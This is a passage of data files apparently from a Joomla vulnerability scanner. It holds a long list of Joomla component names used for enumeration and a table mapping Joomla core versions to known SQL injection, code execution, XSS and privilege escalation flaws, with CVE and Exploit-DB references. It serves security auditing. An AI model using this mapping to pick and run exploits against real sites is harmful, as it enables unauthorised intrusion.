 260 | com_diary
 261 | com_digifolio
 262 | com_digistore
 263 | com_dioneformwizard
 264 | com_directorix
 265 | com_directory
 266 | com_dirfrm
 267 | com_discussions
 268 | com_dj-classifieds
 269 | com_djartgallery
 270 | com_djcatalog
 271 | com_djclassifieds
 272 | com_djiceshoutbox
 273 | com_dm_orders
 274 | com_dms
 275 | com_doc
 276 | com_docman
 277 | com_docmanpaypal
 278 | com_donateprocess
 279 | com_doqment
 280 | com_downloads
 281 | com_drawroot
 282 | com_ds-syndicate
 283 | com_dshop
 284 | com_dt-register
 285 | com_dtracker
 286 | com_dtregister
 287 | com_dv
 288 | com_dwgraphs
 289 | com_easy_youtube_gallery
 290 | com_easyblog
 291 | com_easybook
 292 | com_easydiscuss
 293 | com_easygb
 294 | com_ecommercewd
 295 | com_econtent
 296 | com_education
 297 | com_education_classes
 298 | com_ekrishta
 299 | com_elite
 300 | com_elite_experts
 301 | com_emcomposer
 302 | com_enmasse
 303 | com_ensenanzas
 304 | com_eportfolio
 305 | com_equipment
 306 | com_equotes
 307 | com_esearch
 308 | com_eshop
 309 | com_eslamiat
 310 | com_estateagent
 311 | com_event
 312 | com_eventbooking
 313 | com_eventcal
 314 | com_eventing
 315 | com_eventix
 316 | com_eventlist
 317 | com_events
 318 | com_ewriting
 319 | com_expautospro
 320 | com_expedition
 321 | com_expose
 322 | com_expose_small_rc4
 323 | com_expshop
 324 | com_extcalendar
 325 | com_extended
 326 | com_extplorer
 327 | com_extplorer-test1
 328 | com_extplorer-test2
 329 | com_extplorer-test3
 330 | com_extrasearch
 331 | com_ezautos
 332 | com_ezine
 333 | com_ezstore
 334 | com_fabrik
 335 | com_facebook
 336 | com_facegallery
 337 | com_facileforms
 338 | com_family
 339 | com_fantasytournament
 340 | com_faq
 341 | com_faqbook
 342 | com_fastball
 343 | com_fbb
 344 | com_feederator
 345 | com_fields
 346 | com_filebase
 347 | com_filiale
 348 | com_finder
 349 | com_fireboard
 350 | com_firmy
 351 | com_flash
 352 | com_flashfun
 353 | com_flashgames
 354 | com_flashmagazinedeluxe
 355 | com_flexicontent
 356 | com_flippingbook
 357 | com_flipwall
 358 | com_flyspray
 359 | com_fm
 360 | com_focalpoint
 361 | com_foevpartners
 362 | com_foobla
 363 | com_foobla_suggestions
 364 | com_football
 365 | com_forme
 366 | com_formmaker
 367 | com_formtool
 368 | com_forum
 369 | com_foto
 370 | com_foxcontact
 371 | com_fq
 372 | com_freichat
 373 | com_frontenduseraccess
 374 | com_fss
 375 | com_full
 376 | com_fundraiser
 377 | com_furniture
 378 | com_g2bridge
 379 | com_gadgetfactory
 380 | com_galeria
 381 | com_galleria
 382 | com_gallery
 383 | com_gallery_wd
 384 | com_galleryxml
 385 | com_gambling
 386 | com_game
 387 | com_gameq
 388 | com_gamesbox
 389 | com_gameserver
 390 | com_ganalytics
 391 | com_gantry
 392 | com_garyscookbook
 393 | com_gbufacebook
 394 | com_gcalendar
 395 | com_gds
 396 | com_genealogy
 397 | com_geoboerse
 398 | com_geocontent
 399 | com_giftexchange
 400 | com_gigcal
 401 | com_gigfe
 402 | com_gk3_photoslide
 403 | com_gmap
 404 | com_gmaps
 405 | com_gnosis
 406 | com_golfcourseguid
 407 | com_golfcourseguide
 408 | com_google
 409 | com_googlebase
 410 | com_googlemaplocator
 411 | com_goverment
 412 | com_gpstools
 413 | com_graphics
 414 | com_grid
 415 | com_groovygallery
 416 | com_groupjive
 417 | com_groups
 418 | com_gsticketsystem
 419 | com_guesser
 420 | com_guide
 421 | com_guru
 422 | com_gurujibook
 423 | com_hashcash
 424 | com_hbooking
 425 | com_hbssearch
 426 | com_hdflvplayer
 427 | com_hdvideoshare
 428 | com_healthstats
 429 | com_hello
 430 | com_hello_world
 431 | com_helpdeskpro
 432 | com_hezacontent
 433 | com_hikasho
 434 | com_hmcommunity
 435 | com_horoscope
 436 | com_horses
 437 | com_hospital
 438 | com_hotbrackets
 439 | com_hotel
 440 | com_hotelguide
 441 | com_hotproperties
 442 | com_hotproperty
 443 | com_hotspots
 444 | com_hsconfig
 445 | com_htmlarea3
 446 | com_huruhelpdesk
 447 | com_hwdvideoshare
 448 | com_icagenda
 449 | com_ice
 450 | com_idoblog
 451 | com_idvnews
 452 | com_if_nexus
 453 | com_if_surfalert
 454 | com_igallery
 455 | com_ignitegallery
 456 | com_iigcatalog
 457 | com_ijoomla
 458 | com_ijoomla_archive
 459 | com_ijoomla_rss
 460 | com_imagebrowser
 461 | com_img
 462 | com_imoti
 463 | com_include
 464 | com_informations
 465 | com_inneradmission
 466 | com_installer
 467 | com_inter
 468 | com_intranet
 469 | com_intuit
 470 | com_invitex
 471 | com_iomezun
 472 | com_ionfiles
 473 | com_iproperty
 474 | com_ircmbasic
 475 | com_is
 476 | com_itarmory
 477 | com_items
 478 | com_ixxocart
 479 | com_j-projects
 480 | com_jabode
 481 | com_jacomment
 482 | com_jaextmanager
 483 | com_jajobboard
 484 | com_janews
 485 | com_jashowcase
 486 | com_javoice
 487 | com_jb2
 488 | com_jbcatalog
 489 | com_jbdiary
 490 | com_jbook
 491 | com_jbpeople
 492 | com_jbpublishdownfp
 493 | com_jbudgetsmagic
 494 | com_jbuildozer
 495 | com_jbusinessdirectory
 496 | com_jcafe
 497 | com_jcalpro
 498 | com_jcart
 499 | com_jce
 500 | com_jcollection
 501 | com_jcomments
 502 | com_jcommunity
 503 | com_jcruisereservation
 504 | com_jcs
 505 | com_jd-wiki
 506 | com_jd-wp
 507 | com_jdbexport
 508 | com_jdirectory
 509 | com_jdownloads
 510 | com_jdrugstopics
 511 | com_jeajaxeventcalendar
 512 | com_jeauction
 513 | com_jeauto
 514 | com_jeawdsong
 515 | com_jeclassifieds
 516 | com_jeclassifyads
 517 | com_jedirectory
 518 | com_jeemaarticlecollection
 519 | com_jeemasms
 520 | com_jeeventcalendar
 521 | com_jefaqpro
 522 | com_jeformcr
 523 | com_jegallery
 524 | com_jegridfolio
 525 | com_jeguestbook
 526 | com_jejob
 527 | com_jek2storymultipleform
 528 | com_jem
 529 | com_jembedall
 530 | com_jemediaplayer
 531 | com_jemembership
 532 | com_jemessenger
 533 | com_jepaypervideo
 534 | com_jepoll
 535 | com_jeportfolio
 536 | com_jepropertyfinder
 537 | com_jequestions
 538 | com_jequizmanagement
 539 | com_jequoteform
 540 | com_jereverseauction
 541 | com_jesectionfinder
 542 | com_jesubmit
 543 | com_jeticket
 544 | com_jetour
 545 | com_jeux
 546 | com_jevideogallery
 547 | com_jevideorate
 548 | com_jfbconnect
 549 | com_jfeedback
 550 | com_jfuploader
 551 | com_jfusion
 552 | com_jgen
 553 | com_jgive
 554 | com_jgrid
 555 | com_jhotelreservation
 556 | com_jigsaw
 557 | com_jim
 558 | com_jimtawl
 559 | com_jinc
 560 | com_jinventory
 561 | com_jjgallery
 562 | com_jlike
 563 | com_jlord_rss
 564 | com_jmarket
 565 | com_jmovies
 566 | com_jmsfileseller
 567 | com_jmsmusic
 568 | com_jnews
 569 | com_jnewsletter
 570 | com_jnewspaper
 571 | com_joaktree
 572 | com_job
 573 | com_jobads
 574 | com_jobgrokapp
 575 | com_jobgroklist
 576 | com_jobline
 577 | com_jobprofile
 578 | com_jofacebookgallery
 579 | com_joltcard
 580 | com_jombib
 581 | com_jomcomdev
 582 | com_jomdirectory
 583 | com_jomestate
 584 | com_jomholiday
 585 | com_jomres
 586 | com_jomtube
 587 | com_joobb
 588 | com_joodb
 589 | com_jooget
 590 | com_joom12pic
 591 | com_joomanager
 592 | com_joomblog
 593 | com_joomclip
 594 | com_joomdle
 595 | com_joomdoc
 596 | com_joomdocs
 597 | com_s5_media_player
 598 | com_joomgalaxy
 599 | com_joomgallery
 600 | com_joomgallery&func
 601 | com_joominaflileselling
 602 | com_joomla
 603 | com_joomla-visites
 604 | com_joomla_flash_uploader
 605 | com_joomlaboard
 606 | com_joomlaconnect_be
 607 | com_joomladate
 608 | com_joomlaflashfun
 609 | com_joomlaflickr
 610 | com_joomlalib
 611 | com_joomlapicasa2
 612 | com_joomlaquiz
 613 | com_joomlaradiov5
 614 | com_joomlaupdate
 615 | com_joomlaupdater
 616 | com_joomlavvz
 617 | com_joomlaxplorer
 618 | com_joomloads
 619 | com_joomloc
 620 | com_joomlub
 621 | com_joommail
 622 | com_joomnik
 623 | com_joomportfolio
 624 | com_joomradio
 625 | com_joomrecipe
 626 | com_joomsport
 627 | com_joomtouch
 628 | com_joomtracker
 629 | com_jooproperty
 630 | com_joovideo
 631 | com_jotloader
 632 | com_journal
 633 | com_jp_jobs
 634 | com_jpack
 635 | com_jpad
 636 | com_jphone
 637 | com_jphoto
 638 | com_jpodium
 639 | com_jprojectmanager
 640 | com_jquarks4s
 641 | com_jquickcontact
 642 | com_jr_tfb
 643 | com_jradio
 644 | com_jreactions
 645 | com_jresearch
 646 | com_jreservation
 647 | com_jreviews
 648 | com_jsautoz
 649 | com_jscalendar
 650 | com_jshop
 651 | com_jsjobs
 652 | com_jsplocation
 653 | com_jsptickets
 654 | com_jssupportticket
 655 | com_jstore
 656 | com_jsubscription
 657 | com_jsupport
 658 | com_jtagcalendar
 659 | com_jtagcalendar 
 660 | com_jtagmembersdirectory
 661 | com_jtagminicart
 662 | com_jticketing
 663 | com_jtickets
 664 | com_jtips
 665 | com_jtm
 666 | com_juicy
 667 | com_jukebox
 668 | com_juliaportfolio
 669 | com_jumi
 670 | com_juser
 671 | com_jux_eventon
 672 | com_jux_real_estate
 673 | com_jvcomment
 674 | com_jvehicles
 675 | com_jvideo
 676 | com_jvideoclip
 677 | com_jvideodirect
 678 | com_jvotesystem
 679 | com_jw_allvideos
 680 | com_jwhmcs
 681 | com_jwmmxtd
 682 | com_k2
 683 | com_k2ajaxsearch
 684 | com_k2store
 685 | com_kbase
 686 | com_king
 687 | com_kissgallery
 688 | com_kk
 689 | com_kkcontent
 690 | com_knowledgebase
 691 | com_kochsuite
 692 | com_komento
 693 | com_konsultasi
 694 | com_kp
 695 | com_ksadvertiser
 696 | com_kunena
 697 | com_kunena_google_map_no_geocode
 698 | com_lead
 699 | com_leader
 700 | com_letterman
 701 | com_lexikon
 702 | com_libros
 703 | com_linkdirectory
 704 | com_linkr
 705 | com_listbingo
 706 | com_listing
 707 | com_listoffreeads
 708 | com_livechat
 709 | com_liveticker
 710 | com_lm
 711 | com_lmo
 712 | com_lms
 713 | com_lmsking
 714 | com_loginbox
 715 | com_loudmounth
 716 | com_loudmouth
 717 | com_lovefactory
 718 | com_lowcosthotels
 719 | com_lucygames
 720 | com_lurm
 721 | com_lyftenbloggie
 722 | com_macgallery
 723 | com_machine
 724 | com_mad4joomla
 725 | com_madeira
 726 | com_magazine
 727 | com_magazine_3_0_1
 728 | com_magicdealsweb
 729 | com_maian15
 730 | com_maianmedia
 731 | com_maianmusic
 732 | com_mailarchive
 733 | com_mailto
 734 | com_mambatstaff
 735 | com_mambelfish
 736 | com_mambospgm
 737 | com_mambowiki
 738 | com_manager
 739 | com_maplocator
 740 | com_maqmahelpdesk
 741 | com_market
 742 | com_marketplace
 743 | com_markt
 744 | com_masterforms
 745 | com_matamko
 746 | com_mcquiz
 747 | com_mdigg
 748 | com_media
 749 | com_media_library
 750 | com_mediaalert
 751 | com_medialibrary
 752 | com_mediamall
 753 | com_mediaslide
 754 | com_mediqna
 755 | com_memorix
 756 | com_memory
 757 | com_memorybook
 758 | com_menu
 759 | com_mezun
 760 | com_mgm
 761 | com_minibb
 762 | com_misterestate
 763 | com_mmp
 764 | com_mmsblog
 765 | com_mochigames
 766 | com_model
 767 | com_modern_booking
 768 | com_mojo
 769 | com_monthlyarchive
 770 | com_moodle
 771 | com_moofaq
 772 | com_morfeoshow
 773 | com_mosets
 774 | com_mosforms
 775 | com_mosmedia
 776 | com_mospray
 777 | com_mosres
 778 | com_most
 779 | com_mostwantedrealestate
 780 | com_motor
 781 | com_movm
 782 | com_mp3
 783 | com_mp3_allopass
 784 | com_mscomment
 785 | com_mtfireeagle
 786 | com_mtree
 787 | com_multibanners
 788 | com_multimap
 789 | com_multiroot
 790 | com_multitier
 791 | com_muscol
 792 | com_music
 793 | com_musicgallery
 794 | com_mv_restaurantmenumanager
 795 | com_myalbum
 796 | com_myblog
 797 | com_mycar
 798 | com_mycontent
 799 | com_mydyngallery
 800 | com_myfiles
 801 | com_myform
 802 | com_mygallery
 803 | com_myhome
 804 | com_mymsg
 805 | com_myportfolio
 806 | com_myproject
 807 | com_mysms
 808 | com_mytube
 809 | com_n-forms
 810 | com_na
 811 | com_na_content
 812 | com_na_newsdescription
 813 | com_nbreal
 814 | com_neogallery
 815 | com_neorecruit
 816 | com_neoreferences
 817 | com_netinvoice
 818 | com_network
 819 | com_news
 820 | com_news_portal
 821 | com_newsfeeds
 822 | com_newsflash
 823 | com_newssearch
 824 | com_nfn
 825 | com_nfnaddressbook
 826 | com_nge
 827 | com_niceajaxpoll
 828 | com_nicetalk
 829 | com_ninjamonial
 830 | com_ninjamonials
 831 | com_nkc
 832 | com_noticeboard
 833 | com_noticia
 834 | com_noticias
 835 | com_novasfh
 836 | com_ns_downloadshop
 837 | com_ob
 838 | com_obSuggest
 839 | com_obsuggest
 840 | com_odudeprofile
 841 | com_omnirealestate
 842 | com_omphotogallery
 843 | com_onevote
 844 | com_ongallery
 845 | com_ongumatimesheet20
 846 | com_onismusic
 847 | com_onismusic 
 848 | com_onispetitions
 849 | com_onisquotes
 850 | com_onlineexam
 851 | com_onlineflashquiz
 852 | com_opencart
 853 | com_oprykningspoint_mc
 854 | com_ops
 855 | com_org
 856 | com_orgchart
 857 | com_ornekek
 858 | com_os_cck
 859 | com_osdownloads
 860 | com_osproperty
 861 | com_osservicesbooking
 862 | com_otzivi
 863 | com_ownbiblio
 864 | com_oziogallery
 865 | com_oziogallery2
 866 | com_packages
 867 | com_pandafminigames
 868 | com_panoramic
 869 | com_parcoauto
 870 | com_party
 871 | com_paxgallery
 872 | com_paxxgallery
 873 | com_payage
 874 | com_payplans
 875 | com_pazzari_vm3
 876 | com_pbbooking
 877 | com_pc
 878 | com_pcchess
 879 | com_pccookbook
 880 | com_people
 881 | com_peoplebook
 882 | com_perchagallery
 883 | com_perchaimageattach
 884 | com_performs
 885 | com_personal
 886 | com_philaform
 887 | com_phocadocumentation
 888 | com_phocadownload
 889 | com_phocagallery
 890 | com_phocamaps
 891 | com_photo
 892 | com_photobattle
 893 | com_photoblog
 894 | com_photocontest
 895 | com_photomapgallery
 896 | com_php
 897 | com_phpbridge
 898 | com_phpshop
 899 | com_picasa2gallery
 900 | com_picsell
 901 | com_pinboard
 902 | com_pms
 903 | com_pofos
 904 | com_poll
 905 | com_pollxt
 906 | com_ponygallery
 907 | com_portafolio
 908 | com_portfol
 909 | com_portfolio
 910 | com_portfoliogallery
 911 | com_poweradmin
 912 | com_powermail
 913 | com_prayercenter
 914 | com_press
 915 | com_pressrelease
 916 | com_preventive
 917 | com_price_alert
 918 | com_prime
 919 | com_pro
 920 | com_pro_desk
 921 | com_prod
 922 | com_product
 923 | com_productbook
 924 | com_products
 925 | com_productshowcase
 926 | com_profile
 927 | com_profiler
 928 | com_projectfork
 929 | com_projectlog
 930 | com_projects
 931 | com_proofreader
 932 | com_properties
 933 | com_propertylab
 934 | com_puarcade
 935 | com_publication
 936 | com_publisher
 937 | com_qcontacts
 938 | com_qpersonel
 939 | com_question
 940 | com_quickfaq
 941 | com_quicknews
 942 | com_quiz
 943 | com_quran
 944 | com_races
 945 | com_radio
 946 | com_rand
 947 | com_ranking
 948 | com_rapidrecipe
 949 | com_rd_download
 950 | com_rdautos
 951 | com_realestatemanager
 952 | com_realpin
 953 | com_realtyna
 954 | com_recerca
 955 | com_recipe
 956 | com_recly
 957 | com_record
 958 | com_redshop
 959 | com_redtwitter
 960 | com_referenzen
 961 | com_registration
 962 | com_registrationpro
 963 | com_rekry
 964 | com_remository
 965 | com_reporter
 966 | com_reservations
 967 | com_resman
 968 | com_restaurante
 969 | com_restaurantguide
 970 | com_ricette
 971 | com_rokcandy
 972 | com_rokdownloads
 973 | com_rokmodule
 974 | com_roommgmt
 975 | com_route
 976 | com_rpl
 977 | com_rpx
 978 | com_rsappt_pro2
 979 | com_rsappt_pro3
 980 | com_rsbook_15
 981 | com_rscomments
 982 | com_rsfiles
 983 | com_rsform
 984 | com_rsgallery
 985 | com_rsgallery2
 986 | com_rsmonials
 987 | com_rss
 988 | com_rssreader
 989 | com_rssxt
 990 | com_rwcards
 991 | com_s5clanroster
 992 | com_salesrep
 993 | com_sanpham
 994 | com_sar_news
 995 | com_saxumastro
 996 | com_saxumnumerology
 997 | com_saxumpicker
 998 | com_sbsfile
 999 | com_scheduling
1000 | com_school
1001 | com_schools
1002 | com_science
1003 | com_search
1004 | com_searchlog
1005 | com_sebercart
1006 | com_sectionex
1007 | com_securityimages
1008 | com_seek
1009 | com_sef
1010 | com_seminar
1011 | com_serie
1012 | com_sermon
1013 | com_sermonspeaker
1014 | com_serverstat
1015 | com_sexypolling
1016 | com_seyret
1017 | com_sg
1018 | com_sgicatalog
1019 | com_shop
1020 | com_shoutbox
1021 | com_showdown
1022 | com_siirler
1023 | com_simgenealogy
1024 | com_simple
1025 | com_simple_review
1026 | com_simpleboard
1027 | com_simplecalendar
1028 | com_simpledownload
1029 | com_simplefaq
1030 | com_simpleimageupload
1031 | com_simplemembership
1032 | com_simplephotogallery
1033 | com_simpleshop
1034 | com_simpleswfupload
1035 | com_sitemap
1036 | com_slider
1037 | com_slideshow
1038 | com_smartseller
1039 | com_smartshoutbox
1040 | com_smartsite
1041 | com_smestorage
1042 | com_smf
1043 | com_smslist
1044 | com_sobi2
1045 | com_soccerbet
1046 | com_socialads
1047 | com_socialpinboard
1048 | com_software
1049 | com_solidres
1050 | com_solution
1051 | com_some
1052 | com_soundset
1053 | com_spa
1054 | com_spain
1055 | com_spec
1056 | com_spidercalendar
1057 | com_spidercatalog
1058 | com_spiderfacebook
1059 | com_spiderfaq
1060 | com_spielothek
1061 | com_spmoviedb
1062 | com_sponsorwall
1063 | com_sportfusion
1064 | com_sportspredictions
1065 | com_spsnewsletter
1066 | com_sqlreport
1067 | com_squadmanagement
1068 | com_staffmaster
1069 | com_start
1070 | com_staticxt
1071 | com_store
1072 | com_storedirectory
1073 | com_streetguess
1074 | com_surveyforce
1075 | com_surveymanager
1076 | com_svmap
1077 | com_sweetykeeper
1078 | com_swmenufree4
1079 | com_swmenupro
1080 | com_szallasok
1081 | com_tag
1082 | com_tariff
1083 | com_tax
1084 | com_teacher
1085 | com_team
1086 | com_teamdisplay
1087 | com_teams
1088 | com_tech
1089 | com_tech_article
1090 | com_techfolio
1091 | com_television
1092 | com_thopper
1093 | com_threate
1094 | com_thyme
1095 | com_ticketbook
1096 | com_tickets
1097 | com_tienda
1098 | com_timereturns
1099 | com_timetable
1100 | com_timetrack
1101 | com_tophotelmodule
1102 | com_topics
1103 | com_topmenu
1104 | com_tour
1105 | com_tour_toto
1106 | com_tpdugg
1107 | com_tpjobs
1108 | com_trabalhe_conosco
1109 | com_trade
1110 | com_trading
1111 | com_travelbook
1112 | com_tree
1113 | com_treeg
1114 | com_tsonymf
1115 | com_ttvideo
1116 | com_tupinambis
1117 | com_turtushout
1118 | com_tweetla
1119 | com_twitchtv
1120 | com_uhp
1121 | com_uhp2
1122 | com_ultimateportfolio
1123 | com_uniterevolution2
1124 | com_units
1125 | com_universal
1126 | com_upl
1127 | com_user
1128 | com_userbench
1129 | com_userextranet
1130 | com_users
1131 | com_userstatus
1132 | com_utchat
1133 | com_vehiclemanager
1134 | com_versioning
1135 | com_videodb
1136 | com_videoflow
1137 | com_videogallery
1138 | com_videogallerylite
1139 | com_videos
1140 | com_videowhisper_2wvc
1141 | com_vikappointments
1142 | com_vikbooking
1143 | com_vikrealestate
1144 | com_vikrentcar
1145 | com_vikrentitems
1146 | com_virtualmoney
1147 | com_virtuemart
1148 | com_visa
1149 | com_visualcalendar
1150 | com_vjdeo
1151 | com_vmap
1152 | com_voj
1153 | com_volunteer
1154 | com_vr
1155 | com_vxdate
1156 | com_wallpapers
1157 | com_waticketsystem
1158 | com_wdsubscriptions
1159 | com_webeecomment
1160 | com_weberpcustomer
1161 | com_webhosting
1162 | com_weblinks
1163 | com_webring
1164 | com_webtv
1165 | com_wgpicasa
1166 | com_wines
1167 | com_wire_immogest
1168 | com_wisroyq
1169 | com_wmi
1170 | com_wmt_content_timeline
1171 | com_wmtgallery
1172 | com_wmtpic
1173 | com_wmtportfolio
1174 | com_wmtrssreader
1175 | com_worldrates
1176 | com_wrapper
1177 | com_x-shop
1178 | com_xball
1179 | com_xcloner-backupandrestore
1180 | com_xcomp
1181 | com_xeslidegalfx
1182 | com_xevidmegahd
1183 | com_xewebtv
1184 | com_xfaq
1185 | com_xgallery
1186 | com_xmap
1187 | com_xmovie
1188 | com_xobbix
1189 | com_xsstream-dm
1190 | com_xvs
1191 | com_yanc
1192 | com_ybggal
1193 | com_yellowpages
1194 | com_yelp
1195 | com_yjcontactus
1196 | com_ynews
1197 | com_youtube
1198 | com_youtubegallery
1199 | com_yvcomment
1200 | com_zcalendar
1201 | com_zelig
1202 | com_zhbaidumap
1203 | com_zhgooglemap
1204 | com_zhyandexmap
1205 | com_zimbcomment
1206 | com_zimbcore
1207 | com_zina
1208 | com_zoom
1209 | com_zoomportfolio
1210 | com_ztautolink
1211 | icom_nvitex
1212 | com_cckjseblod
1213 | com_fsave
1214 | com_addproperty
1215 | com_mod_dvfoldercontent
1216 | com_jetext
1217 | com_product_modul
1218 | com_wddownload
1219 | com_download-monitor


--------------------------------------------------------------------------------
/exploit/db/corevul.txt:
--------------------------------------------------------------------------------
 1 | 1.0.7|Joomla! 1.0.7 / Mambo 4.5.3 - (feed) Full Path Disclosure / Denial of Service\nEDB : https://www.exploit-db.com/exploits/1698/
 2 | 1.0.9|Joomla! 1.0.9 - (Weblinks) Blind SQL Injection\nCVE : CVE-2006-7247\nEDB : https://www.exploit-db.com/exploits/1922/
 3 | 1.5.0|Joomla! 1.5 Beta 2 - 'Search' Remote Code Execution\nEDB : https://www.exploit-db.com/exploits/4212/
 4 | 1.5.0|Joomla! 1.5 Beta1/Beta2/RC1 - SQL Injection\nCVE : CVE-2007-4781\nEDB : https://www.exploit-db.com/exploits/4350/
 5 | 1.5.5,1.5.4,1.5.3,1.5.2,1.5.1,1.5.0|Joomla! 1.5.x - (Token) Remote Admin Change Password\nCVE : CVE-2008-3681\nEDB : https://www.exploit-db.com/exploits/6234/
 6 | 1.5.11,1.5.10,1.5.9,1.5.8,1.5.7,1.5.6,1.5.5,1.5.4,1.5.3,1.5.2,1.5.1|Joomla! 1.5.x - Cross-Site Scripting / Information Disclosure\nCVE: CVE-2011-4909\nEDB : https://www.exploit-db.com/exploits/33061/
 7 | 1.5.11,1.5.10,1.5.9,1.5.8,1.5.7,1.5.6,1.5.5,1.5.4,1.5.3,1.5.2,1.5.1|Joomla! 1.5.x - 404 Error Page Cross-Site Scripting\nEDB : https://www.exploit-db.com/exploits/33378/
 8 | 1.5.12|Joomla! 1.5.12 - read/exec Remote files\nEDB : https://www.exploit-db.com/exploits/11263/
 9 | 1.5.12|Joomla! 1.5.12 - connect back Exploit\nEDB : https://www.exploit-db.com/exploits/11262/
10 | 1.6.0|Joomla! 1.6.0-Alpha2 - Cross-Site Scripting\nEDB : https://www.exploit-db.com/exploits/12489/
11 | 1.5.12|Joomla! Plugin 'tinybrowser' 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)\nCVE : CVE-2011-4908\nEDB : https://www.exploit-db.com/exploits/9926/
12 | 1.5|Joomla! 1.5 - URL Redirecting\nEDB : https://www.exploit-db.com/exploits/14722/
13 | 1.5.21,1.5.20,1.5.19,1.5.18,1.5.17,1.5.16,1.5.15,1.5.14,1.5.13,1.5.12,1.5.11,1.5.10,1.5.9,1.5.8,1.5.7,1.5.6,1.5.5,1.5.4,1.5.3,1.5.2,1.5.1|Joomla! 1.5.x - SQL Error Information Disclosure\nEDB : https://www.exploit-db.com/exploits/34955/ 
14 | 1.0.15,1.0.14,1.0.13,1.0.12,1.0.11,1.0.10,1.0.9,1.0.8,1.0.7,1.0.4,1.0.3,1.0.2,1.0.1,1.0.0|Joomla! 1.0.x - 'ordering' Parameter Cross-Site Scripting\nCVE : CVE-2011-0005\nEDB : https://www.exploit-db.com/exploits/35167/
15 | 4.5.1|Joomla! Plugin 'Captcha' 4.5.1 - Local File Disclosure\nEDB : https://www.exploit-db.com/exploits/15958/
16 | 1.5.22,1.6.0|Joomla! - Spam Mail Relay\nEDB : https://www.exploit-db.com/exploits/15979/
17 | 1.6.0|Joomla! 1.6 - Multiple SQL Injections\nCVE : CVE-2011-1151\nEDB : https://www.exploit-db.com/exploits/16992/
18 | 1.5.22,1.6.0|Joomla! 1.5/1.6 - JFilterInput Cross-Site Scripting Bypass\nEDB : https://www.exploit-db.com/exploits/16091/
19 | 1.6.3|Joomla! 1.6.3 - Multiple Cross-Site Scripting Vulnerabilities\nEDB : https://www.exploit-db.com/exploits/35894/
20 | 1.6.3|Joomla! 1.6.3 - Cross-Site Request Forgery\nEDB : https://www.exploit-db.com/exploits/17496/
21 | 1.6.3,1.6.2,1.6.1,1.6.4,1.6.0,1.6.5|Joomla! < 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities\nEDB : https://www.exploit-db.com/exploits/35973/
22 | 1.6.6,1.6.4,1.6.3,1.6.2,1.6.1,1.6.0,1.5.23,1.5.22,1.5.20,1.5.19,1.5.18,1.5.17,1.5.16,1.5.15,1.5.14,1.5.12,1.5.11,1.5.10,1.5.9,1.5.8,1.5.7,1.5.5,1.5.4,1.5.2,1.5.1,1.7.0,1.6.5,1.6.4,1.6.3,1.6.1,1.6.0,1.5.6,1.5.3,1.5.22,1.5.21,1.5.15,1.5.13,1.5.0|Joomla! < 1.7.0 - Multiple Cross-Site Scripting Vulnerabilities\nEDB : https://www.exploit-db.com/exploits/36176/
23 | 2.5.1,2.5.0,1.7.5,1.7.4,1.7.3,1.7.2,1.7.1,1.7.0|Joomla! 'redirect.php' SQL Injection Vulnerability\nEDB : https://www.exploit-db.com/exploits/36913/
24 | 2.5.0,2.5.1|Joomla! 2.5.0 < 2.5.1 - Time Based SQL Injection\nEDB : https://www.exploit-db.com/exploits/18618/
25 | 2.5.4,2.5.3,2.5.2,2.5.1,2.5.0,3.0.2|Joomla! 'highlight.php' PHP Object Injection\nCVE : CVE-2013-1453\nEDB : https://www.exploit-db.com/exploits/24551/
26 | 2.5.4,2.5.3,2.5.2,2.5.1,2.5.0,3.0.2|Joomla! 'remember.php' PHP Object Injection\nCVE : CVE-2013-3242\nEDB : https://www.exploit-db.com/exploits/25087/
27 | 3.2.1|Joomla! 3.2.1 - SQL Injection\nEDB : https://www.exploit-db.com/exploits/31459/
28 | 3.2,3.3,3.4.0,3.4.1,3.4.4,3.4.3,3.4.4|Joomla! 3.2.x < 3.4.4 - SQL Injection\nEDB : https://www.exploit-db.com/exploits/38534/
29 | 2.5.4,2.5.3,2.5.2,2.5.1,2.5.0,1.7.5,1.7.4,1.7.3,1.7.2,1.7.1,1.6.6,1.6.4,1.6.3,1.6.2,1.6.1,1.6.0,1.5.26,1.5.23,1.5.22,1.5.20,1.5.19,1.5.18,1.5.17,1.5.16,1.5.15,1.5.14,1.5.12,1.5.11,1.5.10,1.5.9,1.5.8,1.5.7,1.5.5,1.5.4,1.5.2,1.5.1,1.6.5,1.5.6,1.5.3,1.5.21,1.5.13,1.5.0|Joomla! 1.5 < 3.4.5 - Object Injection Remote Command Execution\nCVE : CVE-2015-8562\nEDB : https://www.exploit-db.com/exploits/38977/
30 | 2.5.4,2.5.3,2.5.2,2.5.1,2.5.0,1.7.5,1.7.4,1.7.3,1.7.2,1.7.1,1.6.6,1.6.4,1.6.3,1.6.2,1.6.1,1.6.0,1.5.26,1.5.23,1.5.22,1.5.20,1.5.19,1.5.18,1.5.17,1.5.16,1.5.15,1.5.14,1.5.12,1.5.11,1.5.10,1.5.9,1.5.8,1.5.7,1.5.5,1.5.4,1.5.2,1.5.1,1.6.5,1.5.6,1.5.3,1.5.21,1.5.13,1.5.0,1.0.0,1.1.0,1.2.0,1.3.0|Joomla! 1.0 < 3.4.5 - Object Injection 'x-forwarded-for' Header Remote Code Execution\nCVE : CVE-2015-8562 , CVE-2015-8566 \nEDB : https://www.exploit-db.com/exploits/39033/
31 | 3.4.7,3.4.6,3.4.4,3.3.5,3.6.3,3.6.1,3.6.0,3.4.5|Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation\nCVE : CVE-2016-8870 , CVE-2016-8869 \nEDB : https://www.exploit-db.com/exploits/40637/
32 | 3.4.7,3.4.6,3.4.4,3.4.3,3.4.2,3.4.1,3.4.0,3.3.6,3.3.5,3.3.4,3.3.3,3.3.2,3.3.1,3.3.0,3.2.6,3.2.5.0,3.2.4,3.2.3,3.2.2,3.2.1,3.1.6,3.1.5,3.1.4,3.1.1,3.1.0,3.0.4,3.0.3,3.0.1,3.0.0,2.5.26,2.5.25,2.5.24,2.5.19,2.5.18,2.5.17,2.5.16,2.5.15,2.5.14,2.5.13,2.5.11,2.5.10,2.5.9,2.5.8,2.5.7,2.5.6,2.5.5,2.5.4,2.5.3,2.5.2,2.5.1,2.5.0,1.7.5,1.7.4,1.7.3,1.7.2,1.7.1,1.7.0,1.6.6,1.6.4,1.6.3,1.6.2,1.6.1,1.6.0,3.6.4,3.6.3,3.6.1,3.6.0,3.4.5,3.2.0,2.5.0,1.7.0,1.6.5|Joomla! Core Remote Privilege Escalation Vulnerability\nCVE : CVE-2016-9838\nEDB : https://www.exploit-db.com/exploits/41157/
